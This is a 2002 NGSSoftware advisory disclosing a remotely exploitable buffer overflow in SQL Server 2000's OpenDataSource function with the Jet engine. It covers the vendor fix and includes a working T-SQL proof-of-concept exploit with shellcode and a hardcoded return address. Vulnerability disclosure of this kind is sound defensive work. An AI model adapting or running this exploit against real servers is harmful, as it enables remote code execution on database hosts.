OpenDataSource Buffer Overflow

June 19th, 2002

NGSSoftware Insight Security Research Advisory

Name: OpenDataSource Buffer Overflow

Systems: Microsoft SQL Server 2000, all Service Packs

Severity: High Risk

Category: Remote Buffer Overrun Vulnerability

Vendor URL: http://www.microsoft.com/

Author: Mark Litchfield (mark@ngssoftware.com)

Contributor: David Litchfield (david@ngssoftware.com)

Advisory URL: http://www.ngssoftware.com/advisories/mssql-ods.txt

Date: 19th June 2002

Advisory number: #NISR19062002

VNA reference : http://www.ngssoftware.com/vna/ms-sql.txt

This advisory covers the solution to one of the problems mentioned in the above VNA URL.

Description

***********

Microsoft’s database server SQL Server 2000 has a remotely exploitable buffer overrun vulnerability

in the OpenDataSource function when combined with the MS Jet Engine. Due to this being a JET problem

other products may also be vulnerable; however the fix for all products should be the same. Please see

the “Fix Information” section for more details.

Details

*******

By making a specially crafted SQL query using the OpenDataSource function it is possible to overflow

a buffer in the SQL Server process, gaining control of its execution remotely. If the SQL Server is

running with SYSTEM privileges, this is default behaviour, then any code supplied by the attacker in

an exploit of the overflow will run uninhibited. Whilst the overflow is UNICODE in nature, as will be

shown, it is still very easy to exploit.

What must be stressed is that this may be launched via a web server application if it is vulnerable

to SQL Injection so just because no direct access can be gained to the SQL Server from the Internet

does not mean it is safe. All customers running SQL Server should check their patch level.

Simple Proof of Concept

***********************

This Transact SQL Script will create a file called “SQL-ODSJET-BO” on the root of the C: drive

on Windows 2000 SP 2 machines

——-8<---------

-- Simple Proof of Concept

-- Exploits a buffer overrun in OpenDataSource()

--

-- Demonstrates how to exploit a UNICODE overflow using T-SQL

-- Calls CreateFile() creating a file called c:\SQL-ODSJET-BO

-- I'm overwriting the saved return address with 0x42B0C9DC

-- This is in sqlsort.dll and is consistent between SQL 2000 SP1 and SP2

-- The address holds a jmp esp instruction.

--

-- To protect against this overflow download the latest Jet Service

-- pack from Microsoft - http://www.microsoft.com/

--

-- David Litchfield (david@ngssoftware.com)

-- 19th June 2002

declare @exploit nvarchar(4000)

declare @padding nvarchar(2000)

declare @saved_return_address nvarchar(20)

declare @code nvarchar(1000)

declare @pad nvarchar(16)

declare @cnt int

declare @more_pad nvarchar(100)

select @cnt = 0

select @padding = 0x41414141

select @pad = 0x4141

while @cnt < 1063

begin

select @padding = @padding + @pad

select @cnt = @cnt + 1

end

-- overwrite the saved return address

select @saved_return_address = 0xDCC9B042

select @more_pad = 0x4343434344444444454545454646464647474747

-- code to call CreateFile(). The address is hardcoded to 0x77E86F87 - Win2K Sp2

-- change if running a different service pack

select @code = 0x558BEC33C05068542D424F6844534A4568514C2D4F68433A5C538D142450504050485050B0C05052B8876FE877FFD0CCCCCCCCCC

select @exploit = N'SELECT * FROM OpenDataSource( ''Microsoft.Jet.OLEDB.4.0'',''Data Source="c:\'

select @exploit = @exploit + @padding + @saved_return_address + @more_pad + @code

select @exploit = @exploit + N'";User ID=Admin;Password=;Extended properties=Excel 5.0'')...xactions'

exec (@exploit)

------->8———

Fix Information

***************

NGSSoftware alerted Microsoft to this problem on the 16th of May 2002 and after

investigation Microsoft recommend that customers should upgrade their version of

Jet. The latest version is available from here:

http://www.microsoft.com/windows2000/downloads/recommended/q282010/default.asp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D38002%26area%3Dsearch%26ordinal%3D2%26redirect%3Dno

A check for this vulnerability has been added to Typhon II, NGSSoftware’s

vulnerability assessment scanner, of which, more information is available

from the NGSSite, http://www.ngssoftware.com/

Further Information

********************

For more information regarding SQL Injection please read

http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf

http://www.ngssoftware.com/papers/advanced_sql_injection.pdf

and for more information about buffer overflows please read

http://www.ngssoftware.com/papers/ntbufferoverflow.html

http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf

http://www.ngssoftware.com/papers/unicodebo.pdf

http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf

Section Navigation


SC Awards 2008


SC Magazine Awards 2008

NGSSoftware wins 'Best Security Company'.

SLBA 2008


South London Business Awards 2008

David Litchfield named as 'Entrepreneur of the Year' at the South London Business Awards 2008.

Latest Vacancies

Experienced CLAS consultant

NGSSoftware are seeking an experienced CLAS consultant capable of writing Security Targets and Evaluation Work Plans for CTAS.

Please send us your CV or resume.

NGS Offices

NGS have offices located in London & St Andrews (UK) and Sydney (Australia).

NGS Consulting

Why do companies around the world – and around the corner – turn to NGS?

Discover what we could do for your business »

NGS Security Training

Find out why we have provided training to some of the world's most security conscious organisations.

Learn from the best!

Speaking Events

We regularly present and speak at international security conferences throughout the world.

OWASP AppSec Europe 2008

AusCERT 2008

ITWeb Security Summit

Customer Testimonials

Read what some of our satisfied customers are saying about us.

NGS Publications

Web Application Hacker's Handbook

Oracle Hacker's Handbook

Database Hacker's Handbook

The Shellcoder's Handbook

SQL Server Security

Configuring IPCop Firewalls


CHECK